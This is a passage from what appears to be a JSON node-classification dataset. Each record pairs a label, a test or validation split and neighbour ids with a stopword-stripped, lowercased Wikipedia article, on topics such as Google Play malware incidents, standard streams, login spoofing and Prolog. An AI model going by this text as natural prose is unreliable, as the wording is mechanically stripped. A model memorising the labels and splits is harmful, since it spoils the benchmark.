explicit content child endangerment violence bullying harassment hate speech gambling illegal activities requiring precautions user-generated content march 2015 google disclosed past months begun using combination automated tools human reviewers check apps malware terms service violations published play store time began rolling new age-based ratings system apps games based given region official ratings authority example esrb us october 2016 google announced new detection filtering system designed provide additional enhancements protect integrity store new system aimed detect filter cases developers attempting manipulate placement apps illegitimate means like fraudulent installs fake reviews incentivized ratings mobile carriers block users installing certain apps march 2009 reports surfaced several tethering apps banned store however apps later restored new ban preventing t-mobile subscribers downloading apps google released statement april 2011 google removed grooveshark app store due unspecified policy violations cnet noted removal came top music labels accused service violating copyright law techcrunch wrote approximately two weeks later grooveshark returned android albeit official app market rather playing android ability install third-party applications browser grooveshark taken responsibility distributing application may 2011 google banned account developer several video game emulators neither google developer publicly revealed reason ban march 2013 google began pull ad blocking apps play store per section 4.4 developers agreement prohibits apps interfere servers services apps exempt power management policies introduced android marshmallow without adversely affected banned july 2018 google banned additional categories apps including perform cryptocurrency mining on-device apps facilitate sale explosives firearms ammunition certain firearms accessories used present ads contain adult content aimed towards children multiple apps highly similar content user experience apps created automated tool wizard service based templates submitted google play operator service behalf persons february 2012 google introduced new automated antivirus system called google bouncer scan new existing apps malware e. g. spyware trojan horses 2017 bouncer feature safety measures within android platform rebranded umbrella name google play protect system regularly scans apps threats android apps ask require certain permissions device including access body sensors calendar camera contacts location microphone phone sms storage july 2017 google described new security effort called peer grouping apps performing similar functionalities calculator apps grouped together attributes compared one app stands requesting device permissions others group google systems automatically flag app security engineers take closer inspection peer grouping based app descriptions metadata statistics download count early march 2011 droiddream trojan rootkit exploit released then-named android market form several free applications many cases pirated versions existing priced apps exploit allowed hackers steal information imei imsi numbers phone model user id service provider exploit also installed backdoor allowed hackers download code infected device exploit affected devices running android versions earlier 2.3 gingerbread google removed apps market immediately alerted apps already downloaded 50,000 times according android police estimate android police wrote method removing exploit infected device reset factory state although community-developed solutions blocking aspects exploit created days later google confirmed 58 malicious apps uploaded android market downloaded 260,000 devices removed store google emailed affected users information far determine information obtained device-specific imei/imsi unique codes used identify mobile devices version android running device opposed personal data account information also announced new remote kill functionality alongside security update lets google remotely remove malicious apps users devices however days later malicious version security update found internet though contain specific droiddream malware new apps featuring malware renamed droiddream light surfaced following june also removed store black hat security conference 2012 security firm trustwave demonstrated ability upload app would circumvent bouncer blocker system application used javascript exploit steal contacts sms messages photos also capable making phone open arbitrary web pages launch denial-of-service attacks nicholas percoco senior vice president trustwave spiderlabs advanced security team stated wanted test bounds capable app stayed google play two weeks repeatedly scanned bouncer system without detection percoco saying attack malware attacker get google play bypass bouncer trustwave reached google share findings noted manual testing apps might necessary detect apps using malware-masking techniques according 2014 research study released riskiq security services company malicious apps introduced google play increased 388 2011 2013 number apps removed google dropped 60 2011 23 2013 study revealed apps personalizing android phones led categories likely malicious according pc world google said would need information riskiq analysis comment findings october 2016 engadget reported blog post named password storage sensitive apps freelance android hacker jon sawyer decided test top privacy apps google play testing two applications one named hide pictures keep safe vault named private photo vault sawyer found significant errors password handling commented companies selling products claim securely store intimate pieces data yet snake oil would near equal protection changing file extension renaming photos april 2017 security firm check point announced malware named falseguide hidden inside approximately 40 game guide apps google play malware capable gaining administrator access infected devices receives additional modules let show popup ads malware type botnet also capable launching ddos attacks alerted malware google removed instances store time approximately two million android users already downloaded apps oldest around since november 2016 june 2017 researchers sophos security company announced finding 47 apps using third-party development library shows intrusive advertisements users phones even apps force-closed user advertisements remain google removed apps receiving reports sophos apps remained asked comment google n't respond august 2017 500 apps removed google play security firm lookout discovered apps contained sdk allowed malicious advertising apps collectively downloaded 100 million times consisted wide variety use cases including health weather photo-editing internet radio emoji 2017 700,000 apps banned google play due abusive contents 70 increase number apps banned 2016 developers publishing google play sued patent infringement patent trolls people broad vaguely worded patents use target small developers developer manages successfully challenge initial assertion patent troll changes claim violation order accuse developer violated different assertion patent situation continues case goes legal system substantial economic costs prompting developers settle february 2013 austin meyer flight simulator game developer sued used copy-protection system app system said google gave us course google provides everyone else making game android meyer claimed google would assist lawsuit stated would settle case battle troll continued several years uploading video june 2016 discussing sued uploading app google play patent troll apparently owns google play store android authority wrote scenario played many app developers many years prompted discussions larger issue stake developers stop making apps fear patent problems users outside countries/regions listed access free apps games google play",
    "neighbors": [
      4096,
      9732,
      5637,
      10756,
      8719,
      3600,
      6672,
      7700,
      8213,
      4120,
      9244,
      10270,
      11294,
      1578,
      7722,
      10284,
      5677,
      9262,
      3633,
      1083,
      9791,
      1089,
      6212,
      69,
      581,
      8262,
      4683,
      4685,
      11343,
      3152,
      3664,
      1619,
      3667,
      10838,
      87,
      8280,
      8285,
      2658,
      9314,
      107,
      8821,
      7293,
      11391,
      10368,
      1670,
      7816,
      6797,
      5262,
      6800,
      8849,
      11408,
      1171,
      10900,
      10392,
      10393,
      8858,
      7835,
      673,
      7841,
      8870,
      1191,
      4775,
      6828,
      4273,
      7857,
      1203,
      6836,
      5819,
      190,
      7359,
      9408,
      9923,
      196,
      3269,
      3782,
      8907,
      10445,
      2258,
      3795,
      1240,
      6361,
      8921,
      9949,
      6367,
      5858,
      2275,
      741,
      231,
      1255,
      236,
      5869,
      8940,
      9970,
      10995,
      3828,
      7926,
      3836,
      8446,
      5892,
      7428,
      8455,
      6408,
      2828,
      9487,
      8464,
      4883,
      788,
      1813,
      280,
      3865,
      10009,
      8476,
      10525,
      798,
      5406,
      288,
      2852,
      4901,
      8486,
      9508,
      10537,
      303,
      7983,
      3380,
      5431,
      2875,
      3900,
      10045,
      1855,
      11590,
      11592,
      11082,
      332,
      2892,
      3918,
      9039,
      3409,
      6993,
      8019,
      2901,
      4951,
      4952,
      5467,
      7515,
      9055,
      2401,
      1379,
      3940,
      9572,
      9574,
      9063,
      2409,
      5483,
      6513,
      7029,
      378,
      4475,
      7548,
      1409,
      4995,
      9605,
      3462,
      3978,
      9610,
      10129,
      5522,
      1427,
      5524,
      10645,
      11159,
      1435,
      10141,
      5536,
      11680,
      2978,
      1959,
      937,
      5546,
      3499,
      6057,
      7595,
      8627,
      7106,
      8646,
      9671,
      5067,
      4044,
      4558,
      463,
      4048,
      2001,
      2010,
      8668,
      479,
      6119,
      488,
      6632,
      2538,
      1516,
      5100,
      5613,
      9712,
      5620,
      11252,
      2045
    ],
    "mask": "None"
  },
  {
    "node_id": 8414,
    "label": 2,
    "text": "Standard_streams:standard streams computer programming standard streams preconnected input output communication channels computer program environment begins execution three input/output i/o connections called standard input stdin standard output stdout standard error stderr originally i/o happened via physically connected system console input via keyboard output via monitor standard streams abstract command executed via interactive shell streams typically connected text terminal shell running changed redirection pipeline generally child process inherits standard streams parent process users generally know standard streams input output channels handle data coming input device write data application data may text encoding binary data many modern systems standard error stream program redirected log file typically error analysis purposes streams may used chain applications meaning output stream one program redirected input stream another application many operating systems expressed listing application names separated vertical bar character reason often called pipeline character well-known example use pagination application providing user control display output stream display operating systems predating unix programs explicitly connect appropriate input output devices os-specific intricacies caused tedious programming task many systems necessary obtain control environment settings access local file table determine intended data set handle hardware correctly case punch card reader magnetic tape drive disk drive line printer card punch interactive terminal one unix several groundbreaking advances abstract devices removed need program know care kind devices communicating older operating systems forced upon programmer record structure frequently non-orthogonal data semantics device control unix eliminated complexity concept data stream ordered sequence data bytes read end file program may also write bytes desired need easily declare count grouping another unix breakthrough automatically associate input output terminal keyboard terminal display respectively default — program programmer absolutely nothing establish input output typical input-process-output program unless chose different paradigm contrast previous operating systems usually required some—often complex—job control language establish connections equivalent burden orchestrated program since unix provided standard streams unix c runtime environment obliged support well result c runtime environments c descendants regardless operating system provide equivalent functionality standard input stream data often text going program program requests data transfers use read operation programs require stream input example dir ls programs display file names contained directory may take command-line arguments perform operations without stream data input unless redirected standard input inherited parent process case interactive shell usually associated keyboard file descriptor standard input 0 zero posix unistd.h definition codice_1 corresponding c stdio.h variable codice_2 similarly c++ iostream variable codice_3 standard output stream program writes output data program requests data transfer write operation programs generate output example file rename command variously called mv move ren silent success unless redirected standard output inherited parent process case interactive shell usually text terminal initiated program file descriptor standard output 1 one posix unistd.h definition codice_4 corresponding c stdio.h variable codice_5 similarly c++ iostream variable codice_6 standard error another output stream typically used programs output error messages diagnostics stream independent standard output redirected separately solves semipredicate problem allowing output errors distinguished analogous function returning pair values – see semipredicate problem multivalued return usual destination text terminal started program provide best chance seen even standard output redirected readily observed example output program pipeline redirected input next program errors program still go directly text terminal acceptable normal direct standard output standard error destination text terminal messages appear order program writes unless buffering involved example common situations standard error stream unbuffered standard output stream line-buffered case text written standard error later may appear terminal earlier standard output stream buffer yet full file descriptor standard error defined posix 2 two unistd.h header file provides symbol codice_7 corresponding c stdio.h variable codice_8 c++ iostream standard header provides two variables associated stream codice_9 codice_10 former unbuffered latter using buffering mechanism c++ streams bourne-style shells allow standard error redirected destination standard output directed using csh-style shells allow standard error redirected destination standard output directed using standard error added unix several wasted phototypesetting runs ended error messages typeset instead displayed user terminal fortran equivalent unix file descriptors convention many fortran implementations use unit numbers codice_11 stdin codice_12 stdout codice_13 stderr fortran-2003 intrinsic codice_14 module standardized include named constants codice_15 codice_16 codice_17 portably specify unit numbers fortran 77 example fortran 2003 example program main end program algol 60 criticized standard file access algol 68 input output facilities collectively referred transput koster coordinated definition transput standard model included three standard channels codice_18 codice_19 codice_20 c programming language standard input output error streams attached existing unix file descriptors 0 1 2 respectively posix environment unistd.h definitions stdin_fileno stdout_fileno stderr_fileno used instead rather magic numbers file pointers stdin stdout stderr also provided ken thompson designer implementer original unix operating system modified sort version 5 unix accept representing standard input spread utilities became part operating system special file version 8 diagnostics part standard output version 6 dennis m. ritchie created concept standard error java standard streams referred stdin stdout stderr public static void main string args c .net languages standard streams referred codice_21 stdin codice_22 stdout codice_23 stderr basic read write capabilities stdin stdout streams also accessible directly class codice_24 e.g codice_25 used instead codice_26 codice_21 codice_22 codice_23 codice_30 stdin codice_31 stdout stderr objects allow access underlying standard streams text basis full binary access standard streams must performed codice_32 objects returned codice_33 codice_34 codice_35 respectively // c example public static int main string args visual basic .net example public function main integer end function applying codice_36 class one use instance properties codice_37 codice_38 codice_39 class access standard streams process graphical user interfaces guis rarely make use standard streams consequently redirecting gui programs constructing gui pipeline neither practical useful nearest analogy probably cutting copying one application pasting another since manual user operations required moving large numbers pastes especially efficient services menu implemented nextstep mac os x also analogous standard streams operating systems graphical applications provide functionality systemwide menu operates current selection gui matter application gui programs primarily unix still write debug information standard error others many unix media players may read files standard input popular windows programs open separate console window addition gui windows emulators psx dosbox gtk-server use stdin communication interface interpreted program realize gui common lisp interface manager paradigm presents gui elements sent extended output stream",
    "neighbors": [
      8065,
      4750,
      4369,
      3222,
      6813,
      7325,
      3488,
      9507,
      9128,
      5677,
      7343,
      8499,
      692,
      2485,
      3382,
      8504,
      701,
      1610,
      1611,
      7626,
      335,
      8402,
      9298,
      10586,
      8289,
      2786,
      6498,
      10083,
      4968,
      4333,
      5357,
      7667,
      5492,
      3573,
      7544,
      2556,
      2045
    ],
    "mask": "None"
  },
  {
    "node_id": 8415,
    "label": 3,
    "text": "Jet_Set_Willy_II:jet set willy ii jet set willy ii final frontier platform game released 1985 software projects variety 8-bit home computers official sequel jet set willy one successful home computer games ever released officially jet set willy ii final frontier last miner willy series although numerous unofficial sequels remakes homages updates released even day jet set willy ii expansion original jsw rather new game unto map primarily expanded version original mansion new elements predecessor several based rumoured events jsw fact never programmed able launch titular ship screen called yacht explore island zx spectrum amstrad cpc msx versions willy blasted rocket room space 33 rooms dons spacesuit due proliferation hacking cheating original game jet set willy ii pays homage includes screen called cheat accessed cheating control willy also differs original jet set willy ii written original programmer matthew smith instead developed derrick p. rowson jet set willy ii came form enhanced copy protection called padlock ii prevent felt tip copying seven pages rather single page used jet set willy ending jsw ii also different willy collected 150 175 available items goes bed game takes control willy guides bathroom falls toilet lands room named oh central cavern laid identically deriving name opening level manic miner screen playable amstrad cpc version escape save player intentionally killing remaining lives jsw ii originally created amstrad version jet set willy derrick p. rowson steve wetherill expansions exploit 64k ram amstrad cpc range compared 48k zx spectrum game home platform version subsequently ported back spectrum porting across amstrad porting back spectrum may also explain number small differences including loss coloured backgrounds certain screens cpc version ran 4-colour display mode game subsequently ported platforms including commodore 64 commodore 16 bbc micro acorn electron msx bbc micro cassette version 2 rooms zx spectrum version omits 60 rooms rather subset cpc zx spectrum versions unofficial ports acorn archimedes windows/dos unix/x environments also exist c64 screen different format amstrad developers unable take data used amstrad instead lay re-implement screens sprites however rowson able use much data directly amstrad hence game released sooner in-depth article game code spectrum stated room compressed took differing amounts memory room editor would impossible code november 2016 rowson released jsw2+ re-write jsw2 well technical improvements code allowing complicated rooms built-in ‘ cheat ’ devices allowing infinite lives teleportation rowson also added new rooms made many rooms easier fewer slower sprites",
    "neighbors": [
      9322,
      10862,
      9006,
      10931,
      1527,
      4956
    ],
    "mask": "None"
  },
  {
    "node_id": 8416,
    "label": 7,
    "text": "LotusLive:lotuslive ibm smartcloud social business suite business networking collaboration cloud-based services hosted ibm collaboration solutions division ibm integrated services include social networking businesses online meetings file sharing instant message data visualization e-mail several ibm smartcloud social business offerings ibm smartcloud social business also provides mechanisms third-party applications integrate lotuslive ibm announced integration skype linkedin salesforce.com ups silanis lotusphere 2012 ibm announced rebranded lotuslive product line ibm smartcloud social business",
    "neighbors": [
      10090,
      5612,
      8622,
      7983,
      3323,
      467,
      1467
    ],
    "mask": "Test"
  },
  {
    "node_id": 8417,
    "label": 4,
    "text": "Login_spoofing:login spoofing login spoofings techniques used steal user password user presented ordinary looking login prompt username password actually malicious program usually called trojan horse control attacker username password entered information logged way passed along attacker breaching security prevent operating systems require special key combination called secure attention key entered login screen presented example control-alt-delete users instructed report login prompts appear without pressed secure attention sequence kernel part operating system interacts directly hardware detect whether secure attention key pressed intercepted third party programs unless kernel compromised whereas concept phishing usually involves scam victims respond unsolicited e-mails either identical similar appearance familiar site may prior affiliation login spoofing usually indicative much heinous form vandalism attack case attacker already gained access victim computer least degree internet-based login spoofing spoofing caused",
    "neighbors": [
      8418,
      10756,
      10378,
      7983,
      5435
    ],
    "mask": "None"
  },
  {
    "node_id": 8418,
    "label": 4,
    "text": "Secure_attention_key:secure attention key secure attention key sak secure attention sequence sas special key key combination pressed computer keyboard login screen must user completely trustworthy operating system kernel interacts directly hardware able detect whether secure attention key pressed event detected kernel starts trusted login processing secure attention key designed make login spoofing impossible kernel suspend program including masquerading computer login process starting trustable login operation systems configured use sak users must always suspicious login prompts displayed without pressed key combination microsoft windows handled winlogon component use secure attention key also required windows user account control uac prompt examples similar combination often used pc system bios force reboot boot sequence",
    "neighbors": [
      8417,
      10839,
      7207,
      5000,
      10378,
      1515,
      13,
      6797,
      7983,
      823,
      9016,
      537,
      5435,
      3351,
      93
    ],
    "mask": "Test"
  },
  {
    "node_id": 8419,
    "label": 8,
    "text": "WampServer:wampserver wampserver refers software stack microsoft windows operating system created romain bourdon consisting apache web server openssl ssl support mysql database php programming language",
    "neighbors": [
      865,
      8644,
      6797,
      3182,
      823,
      7022,
      7983,
      11030,
      4439,
      8539,
      10939
    ],
    "mask": "None"
  },
  {
    "node_id": 8420,
    "label": 7,
    "text": "Péter_Kacsuk:péter kacsuk péter kacsuk hungarian computer scientist mta-sztaki budapest hungary péter kacsuk received msc university doctorate degrees technical university budapest hungary 1976 1984 respectively received kandidat degree equivalent phd hungarian academy 1989 habilitated university vienna 1997 received professor title hungarian president 1999 doctor academy degree dsc hungarian academy sciences 2001 currently head laboratory parallel distributed systems lpds computer automation research institute hungarian academy sciences péter kacsuk part-time full professor cavendish school computer science university westminster eötvös lóránd university science since 2001 served visiting scientist professor several times various universities australia austria canada england germany spain japan usa published two books two lecture notes 200 scientific papers parallel computer architectures parallel software engineering grid computing chair joint egee see-grid summer school grid application support 2006 2007 chair coregrid summer school 2007 involved many eu grid projects edg gridlab egee seegrid coregrid gridcoord iceage cancergrid etc. coordinator eu fp7 edges enabling desktop grids e-science project co-editor-in-chief journal grid computing published springer received following awards selected media appearances hungary links audio/video material",
    "neighbors": [
      8912,
      6042,
      5956,
      4510
    ],
    "mask": "Validation"
  },
  {
    "node_id": 8421,
    "label": 9,
    "text": "Prolog:prolog prolog logic programming language associated artificial intelligence computational linguistics prolog roots first-order logic formal logic unlike many programming languages prolog intended primarily declarative programming language program logic expressed terms relations represented facts rules computation initiated running query relations language first conceived alain colmerauer group marseille france early 1970s first prolog system developed 1972 colmerauer philippe roussel prolog one first logic programming languages remains popular among languages today several free commercial implementations available language used theorem proving expert systems term rewriting type systems automated planning well original intended field use natural language processing modern prolog environments support creation graphical user interfaces well administrative networked applications prolog well-suited specific tasks benefit rule-based logical queries searching databases voice control systems filling templates prolog program logic expressed terms relations computation initiated running query relations relations queries constructed using prolog single data type term relations defined clauses given query prolog engine attempts find resolution refutation negated query negated query refuted i.e. instantiation free variables found makes union clauses singleton set consisting negated query false follows original query found instantiation applied logical consequence program makes prolog logic programming languages particularly useful database symbolic mathematics language parsing applications prolog allows impure predicates checking truth value certain special predicates may deliberate side effect printing value screen programmer permitted use amount conventional imperative programming logical paradigm inconvenient purely logical subset called pure prolog well number extralogical features prolog single data type term terms either atoms numbers variables compound terms special cases compound terms iso prolog provides codice_11 codice_12 codice_13 codice_14 predicates type-checking prolog programs describe relations defined means clauses pure prolog restricted horn clauses two types clauses facts rules rule form head body read head true body true rule body consists calls predicates called rule goals built-in predicate codice_15 meaning 2-arity operator name codice_16 denotes conjunction goals codice_17 denotes disjunction conjunctions disjunctions appear body head rule clauses empty bodies called facts example fact cat tom equivalent rule cat tom true built-in predicate codice_18 always true given fact one ask tom cat things cats clauses bodies called rules example rule animal x cat x add rule ask things animals due relational nature many built-in predicates typically used several directions example codice_19 used determine length list codice_20 given list codice_21 well generate list skeleton given length codice_22 also generate list skeletons lengths together codice_23 similarly codice_24 used append two lists codice_25 given lists codice_26 codice_27 well split given list parts codice_28 given list codice_21 reason comparatively small set library predicates suffices many prolog programs general purpose language prolog also provides various built-in predicates perform routine activities like input/output using graphics otherwise communicating operating system predicates given relational meaning useful side-effects exhibit system example predicate codice_30 displays term screen execution prolog program initiated user posting single goal called query logically prolog engine tries find resolution refutation negated query resolution method used prolog called sld resolution negated query refuted follows query appropriate variable bindings place logical consequence program case generated variable bindings reported user query said succeeded operationally prolog execution strategy thought generalization function calls languages one difference multiple clause heads match given call case system creates choice-point unifies goal clause head first alternative continues goals first alternative goal fails course executing program variable bindings made since recent choice-point created undone execution continues next alternative choice-point execution strategy called chronological backtracking example results following query evaluated true obtained follows initially matching clause-head query codice_31 first one proving query equivalent proving body clause appropriate variable bindings place i.e. conjunction codice_32 next goal proved leftmost one conjunction i.e. codice_33 two clause heads match goal system creates choice-point tries first alternative whose body codice_34 goal proved using fact codice_35 binding codice_36 generated next goal proved second part conjunction codice_37 proved corresponding fact since goals could proved query succeeds since query contained variables bindings reported user query variables like father_child father child enumerates valid answers backtracking notice code stated query codice_38 also succeeds one would insert additional goals describe relevant restrictions desired iterative algorithms implemented means recursive predicates built-in prolog predicate codice_39 provides negation failure allows non-monotonic reasoning goal codice_40 rule legal x \\+ illegal x evaluated follows prolog attempts prove codice_41 proof goal found original goal i.e. codice_40 fails proof found original goal succeeds therefore codice_39 prefix operator called provable operator since query codice_44 succeeds goal provable kind negation sound argument ground i.e contains variables soundness lost argument contains variables proof procedure complete particular query codice_45 used enumerate things legal prolog loading code referred consulting prolog used interactively entering queries prolog prompt codice_46 solution prolog writes codice_47 solution exists printed multiple solutions query requested entering semi-colon codice_48 guidelines good programming practice improve code efficiency readability maintainability follow example programs written prolog example query computation expressed declaratively sequence state transitions example optimizing compiler three optimization passes could implemented relation initial program optimized form equivalently using dcg notation quicksort sorting algorithm relating list sorted version design pattern general reusable solution commonly occurring problem software design prolog design patterns go various names skeletons techniques cliches program schemata logic description schemata alternative design patterns higher order programming higher-order predicate predicate takes one predicates arguments although support higher-order programming takes prolog outside domain first-order logic allow quantification predicates iso prolog built-in higher-order predicates codice_49 codice_50 codice_51 codice_52 codice_53 codice_54 furthermore since arbitrary prolog goals constructed evaluated run-time easy write higher-order predicates like codice_55 applies arbitrary predicate member given list codice_56 filters elements satisfy given predicate also allowing currying convert solutions temporal representation answer substitutions backtracking spatial representation terms prolog various all-solutions predicates collect answer substitutions given query list used list comprehension example perfect numbers equal sum proper divisors used enumerate perfect numbers also check whether number perfect another example predicate codice_57 applies predicate codice_58 corresponding positions pair lists codice_58 predicate codice_60 codice_61 unifies codice_62 single unique value codice_63 equivalent applying map function functional programming codice_64 higher-order programming style prolog pioneered hilog λprolog programming large prolog provides module system module system standardised iso however prolog compilers support modules compatibility problems module systems major prolog compilers consequently modules written one prolog compiler necessarily work others special notation called definite clause grammars dcgs rule defined via codice_65 instead codice_66 expanded preprocessor codice_67 facility analogous macros languages according straightforward rewriting rules resulting ordinary prolog clauses notably rewriting equips predicate two additional arguments used implicitly thread state around analogous monads languages dcgs often used write parsers list generators also provide convenient interface difference lists prolog homoiconic language provides many facilities reflection implicit execution strategy makes possible write concise meta-circular evaluator also called meta-interpreter pure prolog code solve true solve subgoal1 subgoal2 solve head codice_68 represents empty conjunction codice_69 unifies clauses database form codice_70 since prolog programs sequences prolog terms codice_66 infix operator easily read inspected using built-in mechanisms like codice_72 possible write customized interpreters augment prolog domain-specific features example sterling shapiro present meta-interpreter performs reasoning uncertainty reproduced slight modifications solve true 1 solve subgoal1 subgoal2 certainty solve goal 1 solve head certainty interpreter uses table built-in prolog predicates form builtin b builtin read x etc clauses represented codice_73 given called codice_74 execute codice_75 obtain measure certainty result pure prolog based subset first-order predicate logic horn clauses turing-complete turing completeness prolog shown using simulate turing machine simple example turing machine specified facts machine performs incrementation one number unary encoding loops number 1 cells appends additional 1 end example query result illustrates computation expressed declaratively sequence state transitions implemented prolog relation successive states interest iso prolog standard consists two parts iso/iec 13211-1 published 1995 aims standardize existing practices many implementations core elements prolog clarified aspects language previously ambiguous leads portable programs three corrigenda cor.1:2007 cor.2:2012 cor.3:2017 iso/iec 13211-2 published 2000 adds support modules standard standard maintained iso/iec jtc1/sc22/wg17 working group ansi x3j17 us technical advisory group standard efficiency prolog code typically compiled abstract machine code often influenced register-based warren abstract machine wam instruction set implementations employ abstract interpretation derive type mode information predicates compile time compile real machine code high performance devising efficient implementation methods prolog code field active research logic programming community various execution methods employed implementations include clause binarization stack-based virtual machines prolog systems typically implement well-known optimization method called tail call optimization tco deterministic predicates exhibiting tail recursion generally tail calls clause stack frame discarded performing call tail position therefore deterministic tail-recursive predicates executed constant stack space like loops languages finding clauses unifiable term query linear number clauses term indexing uses data structure enables sub-linear-time lookups indexing affects program performance affect semantics prologs use indexing first term indexing terms expensive techniques based field-encoded words superimposed codewords provide fast indexing across full query head prolog systems win-prolog swi-prolog implement hashing help handle large datasets efficiently tends yield large performance gains working large corpora wordnet prolog systems b-prolog xsb swi-prolog yap ciao implement memoization method called tabling frees user manually storing intermediate results subgoals encountered query evaluation maintained table along answers subgoals subgoal re-encountered evaluation reuses information table rather re-performing resolution program clauses tabling space–time tradeoff execution time reduced using memory store intermediate results fifth generation computer systems project attempts implement prolog hardware aim achieving faster execution dedicated architectures furthermore prolog number properties may allow speed-up parallel execution recent approach compile restricted prolog programs field programmable gate array however rapid progress general-purpose hardware consistently overtaken specialised architectures although prolog widely used research education prolog logic programming languages significant impact computer industry general applications small industrial standards exceeding 100,000 lines code programming large considered complicated prolog compilers support modules compatibility problems module systems major prolog compilers portability prolog code across implementations also problem developments since 2007 meant portability within family edinburgh/quintus derived prolog implementations good enough allow maintaining portable real-world applications software developed prolog criticised high performance penalty compared conventional programming languages particular prolog non-deterministic evaluation strategy problematic programming deterministic computations even using n't care non-determinism single choice made instead backtracking possibilities cuts language constructs may used achieve desirable performance destroying one prolog main attractions ability run programs backwards forwards prolog purely declarative constructs like cut operator procedural reading prolog program needed understand order clauses prolog program significant execution strategy language depends logic programming languages datalog truly declarative restrict language result many practical prolog programs written conform prolog depth-first search order rather purely declarative logic programs various implementations developed prolog extend logic programming capabilities numerous directions include types modes constraint logic programming clp object-oriented logic programming oolp concurrency linear logic llp functional higher-order logic programming capabilities plus interoperability knowledge bases prolog untyped language attempts introduce types date back 1980s 2008 still attempts extend prolog types type information useful type safety also reasoning prolog programs. ref name= cite doi|10.1007/bf01213601 /ref syntax prolog specify arguments predicate inputs outputs however information significant recommended included comments modes provide valuable information reasoning prolog programs also used accelerate execution constraint logic programming extends prolog include concepts constraint satisfaction constraint logic program allows constraints body clauses codice_76 suited large-scale combinatorial optimisation problems thus useful applications industrial settings automated time-tabling production scheduling prolog systems ship least one constraint solver finite domains often also solvers domains like rational numbers flora-2 object-oriented knowledge representation reasoning system based f-logic incorporates hilog transaction logic defeasible reasoning logtalk object-oriented logic programming language use prolog implementations back-end compiler multi-paradigm language includes support prototypes classes oblog small portable object-oriented extension prolog margaret mcdougall edcaad university edinburgh objlog frame-based language combining objects prolog ii cnrs marseille france prolog++ developed logic programming associates first released 1989 ms-dos pcs support platforms added second version released 1995 book prolog++ chris moss published addison-wesley 1994 prolog systems provide graphics library swi-prolog visual prolog win-prolog b-prolog prolog-mpi open-source swi-prolog extension distributed computing message passing interface also various concurrent prolog programming languages prolog implementations notably swi-prolog ciao support server-side web programming support web protocols html xml also extensions support semantic web formats rdf owl prolog also suggested client-side language cedar free basic prolog interpreter version 4 cedar fca flash cedar app support provides new platform programming prolog actionscript frameworks exist bridge prolog languages name prolog chosen philippe roussel abbreviation french programming logic created around 1972 alain colmerauer philippe roussel based robert kowalski procedural interpretation horn clauses motivated part desire reconcile use logic declarative knowledge representation language procedural representation knowledge popular north america late 1960s early 1970s according robert kowalski first prolog system developed 1972 colmerauer phillipe roussel first implementation prolog interpreter written fortran gerard battani henri meloni david h. d. warren took interpreter edinburgh implemented alternative front-end came define “ edinburgh prolog ” syntax used modern implementations warren also implemented first compiler prolog creating influential dec-10 prolog collaboration fernando pereira warren later generalised ideas behind dec-10 prolog create warren abstract machine european ai researchers favored prolog americans favored lisp reportedly causing many nationalistic debates merits languages much modern development prolog came impetus fifth generation computer systems project fgcs developed variant prolog named kernel language first operating system pure prolog originally restricted use resolution theorem prover horn clauses form application theorem-prover treats clauses procedures pure prolog soon extended however include negation failure negative conditions form b shown trying failing solve corresponding positive conditions b subsequent extensions prolog original team introduced constraint logic programming abilities implementations prolog used watson watson uses ibm deepqa software apache uima unstructured information management architecture framework system written various languages including java c++ prolog runs suse linux enterprise server 11 operating system using apache hadoop framework provide distributed computing prolog used pattern matching natural language parse trees developers stated required language could conveniently express pattern matching rules parse trees annotations named entity recognition results technology could execute rules efficiently found prolog ideal choice language due simplicity expressiveness",
    "neighbors": [
      10752,
      2062,
      4624,
      6160,
      5149,
      9245,
      2045,
      50,
      3126,
      1591,
      1079,
      2620,
      8771,
      9796,
      8262,
      1610,
      9290,
      10324,
      5719,
      4196,
      7780,
      9828,
      6248,
      3698,
      6775,
      9345,
      2181,
      1672,
      8854,
      2206,
      1697,
      4774,
      10413,
      5816,
      6335,
      5319,
      8904,
      10953,
      3276,
      3277,
      10452,
      729,
      7392,
      11490,
      8421,
      8426,
      8430,
      1269,
      1287,
      11538,
      11541,
      11036,
      5917,
      8479,
      11555,
      5413,
      6437,
      7983,
      11056,
      305,
      10547,
      8000,
      6977,
      10569,
      10571,
      8524,
      2904,
      10584,
      1890,
      6502,
      11625,
      8046,
      10097,
      3447,
      8057,
      5510,
      5521,
      416,
      1952,
      10145,
      5031,
      1963,
      8627,
      4025,
      5564,
      963,
      4550,
      2505,
      5585,
      5074,
      11219,
      2519,
      4058,
      4572,
      479,
      4064,
      4069,
      5614,
      1010,
      9714,
      2557,
      10238
    ],
    "mask": "None"
  },
  {
    "node_id": 8422,
    "label": 2,
    "text": "Nyala_(typeface):nyala typeface nyala font based sylfaen designed support latin alphabet ge'ez script used ethiopic languages created john hudson geraldine wade part windows vista windows server 2008 windows 7 font named mountain nyala species great african antelope native highlands ethiopia",
    "neighbors": [
      2593,
      4130,
      9539,
      7973,
      4138,
      4141,
      6797,
      1487,
      3538,
      4146,
      4148,
      8374,
      9654,
      4127
    ],
    "mask": "Test"
  },
  {
    "node_id": 8423,
    "label": 2,
    "text": "Series_30:series 30 series 30 often shortened s30 software platform application user interface created nokia entry level mobile phones lower series 40 s30 phones capable running java apps 2014 microsoft acquired nokia mobile phones business later discontinued s30 favor series 30+ first series 30 device nokia 1100 2003 originally s30 supposed one menu key second one added release nokia 1110 s30 devices also n't 5-way d-pad 4-way d-pad except nokia 1100 2-way d-pad following list series 30 devices released nokia",
    "neighbors": [
      1537,
      10754,
      11271,
      529,
      3089,
      10770,
      5143,
      2072,
      5659,
      10273,
      4132,
      40,
      3626,
      7727,
      10802,
      7220,
      5175,
      9784,
      1083,
      9292,
      7246,
      1615,
      5201,
      7253,
      3162,
      5211,
      6748,
      607,
      1633,
      2658,
      6763,
      109,
      1148,
      8316,
      8829,
      11391,
      6787,
      6276,
      3205,
      6797,
      9359,
      1687,
      10393,
      5274,
      669,
      6301,
      673,
      6310,
      167,
      5290,
      10410,
      7857,
      7866,
      1728,
      5824,
      4291,
      7877,
      199,
      4305,
      2259,
      6870,
      9443,
      3300,
      4324,
      7399,
      8433,
      5369,
      8976,
      8472,
      11545,
      5406,
      4383,
      7983,
      821,
      7991,
      321,
      7492,
      10053,
      11079,
      9033,
      2380,
      6996,
      854,
      10583,
      10080,
      10599,
      6505,
      6508,
      2925,
      5998,
      8576,
      8577,
      11655,
      1424,
      2449,
      8083,
      3477,
      7063,
      5019,
      8098,
      4003,
      7617,
      967,
      9166,
      2001,
      5600,
      10215,
      3561,
      9194,
      495,
      1524,
      1533
    ],
    "mask": "Validation"
  },
  {
    "node_id": 8424,
    "label": 6,
